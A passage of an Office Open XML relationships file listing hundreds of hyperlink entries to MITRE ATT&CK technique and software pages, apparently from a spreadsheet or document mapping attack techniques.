Target="https://attack.mitre.org/techniques/T1154" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1217" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1174" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1205" TargetMode="External"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1018" TargetMode="External"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1198" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1081" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1203" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1148" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070" TargetMode="External"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1169" TargetMode="External"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1185" TargetMode="External"/><Relationship Id="rId455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1182" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1001" TargetMode="External"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1093" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1113" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1146" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1132" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1133" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1118" TargetMode="External"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1192" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1188" TargetMode="External"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1049" TargetMode="External"/><Relationship Id="rId466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1047" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1010" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1175" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1046" TargetMode="External"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1108" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1092" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1157" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1167" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1222" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1160" TargetMode="External"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1221" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027" TargetMode="External"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1076" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1064" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1041" TargetMode="External"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1023" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1200" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1168" TargetMode="External"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1045" TargetMode="External"/><Relationship Id="rId404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071" TargetMode="External"/><Relationship Id="rId446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1127" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1201" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1013" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1176" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1214" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1074" TargetMode="External"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1091" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1212" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1179" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1202" TargetMode="External"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1206" TargetMode="External"/><Relationship Id="rId457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1104" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1103" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1115" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055" TargetMode="External"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1180" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1022" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1038" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1181" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1208" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1035" TargetMode="External"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1033" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1152" TargetMode="External"/><Relationship Id="rId468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1084" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1123" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1091" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1126" TargetMode="External"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1060" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1173" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1006" TargetMode="External"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1178" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1162" TargetMode="External"/><Relationship Id="rId437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1072" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1139" TargetMode="External"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137" TargetMode="External"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1105" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1196" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1005" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1011" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1158" TargetMode="External"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1014" TargetMode="External"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1032" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1056" TargetMode="External"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1153" TargetMode="External"/><Relationship Id="rId448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1199" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1031" TargetMode="External"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1034" TargetMode="External"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1086" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1094" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1030" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1211" TargetMode="External"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1064" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1062" TargetMode="External"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1195" TargetMode="External"/><Relationship Id="rId459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1125" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1155" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1215" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1026" TargetMode="External"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055" TargetMode="External"/><Relationship Id="rId470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1028" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1191" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1073" TargetMode="External"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1121" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1008" TargetMode="External"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1058" TargetMode="External"/><Relationship Id="rId428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1161" TargetMode="External"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1135" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1131" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1223" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1114" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1136" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1044" TargetMode="External"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0095" TargetMode="External"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218" TargetMode="External"/><Relationship Id="rId439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1209" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1054" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1155" TargetMode="External"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1075" TargetMode="External"/><Relationship Id="rId450" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1111" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1009" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1039" TargetMode="External"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1145" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1024" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1052" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1147" TargetMode="External"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1085" TargetMode="External"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1151" TargetMode="External"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1095" TargetMode="External"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0075" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1088" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1207" TargetMode="External"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0106" TargetMode="External"/><Relationship Id="rId461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1102" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1116" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1068" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1014" TargetMode="External"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1012" TargetMode="External"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1063" TargetMode="External"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1019" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1014" TargetMode="External"/><Relationship Id="rId430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1007" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1017" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1079" TargetMode="External"/><Relationship Id="rId472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1004" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1172" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1083" TargetMode="External"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1117" TargetMode="External"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1166" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1109" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1149" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1156" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1119" TargetMode="External"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1040" TargetMode="External"/><Relationship Id="rId441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1099" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1197" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1106" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1187" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1150" TargetMode="External"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1066" TargetMode="External"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1216" TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1097" TargetMode="External"/><Relationship Id="rId410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1165" TargetMode="External"/><Relationship Id="rId452" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1065" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1119" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1025" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1172" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1083" TargetMode="External"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1057" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1117" TargetMode="External"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1042" TargetMode="External"/><Relationship Id="rId72" 